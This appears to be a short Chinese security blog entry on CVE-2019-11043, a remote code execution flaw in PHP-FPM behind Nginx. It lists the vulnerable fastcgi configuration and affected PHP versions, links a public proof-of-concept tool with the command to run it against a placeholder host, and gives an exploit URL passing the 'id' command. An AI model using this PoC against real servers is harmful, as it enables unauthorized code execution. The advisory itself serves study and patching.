应用安全

CVE-2016-7411

CVE-2016-7412

CVE-2016-7413

CVE-2016-7414

CVE-2016-7415

CVE-2016-7416

CVE-2016-7417

CVE-2016-7418

CVE-2019-11043

Date：
2019.9.16

类型：
远程代码执行

前置条件：

Nginx + fastcgi + php-fpm

配置文件信息如下：
location ~ [^/].php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

影响范围：
version>php 7, php5(EXP暂无)
PHP 7.1版本小于7.1.33；PHP 7.2版本小于7.2.24；PHP 7.3版本小于7.3.11

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"


ExP:
http://ip:8080/index.php?a=id

查看全文

相关阅读:
Bootstrap留言板界面练习
 Bootstrap 学习
 web | [GXYCTF2019]禁止套娃
 re | [GKCTF2020]WannaReverse
PE文件结构 | 在PE文件的空白区添加代码
 PE文件结构 | RVA与FOA的转换
 re | [NPUCTF2020]BasicASM
win32 | WinSock2网络编程 | socket-tcp通信
 web | flask 修饰器实现原理
 运维 | 配置LNMP | 基于docker.ubuntu:16.04

原文地址：https://www.cnblogs.com/AtesetEnginner/p/11735653.html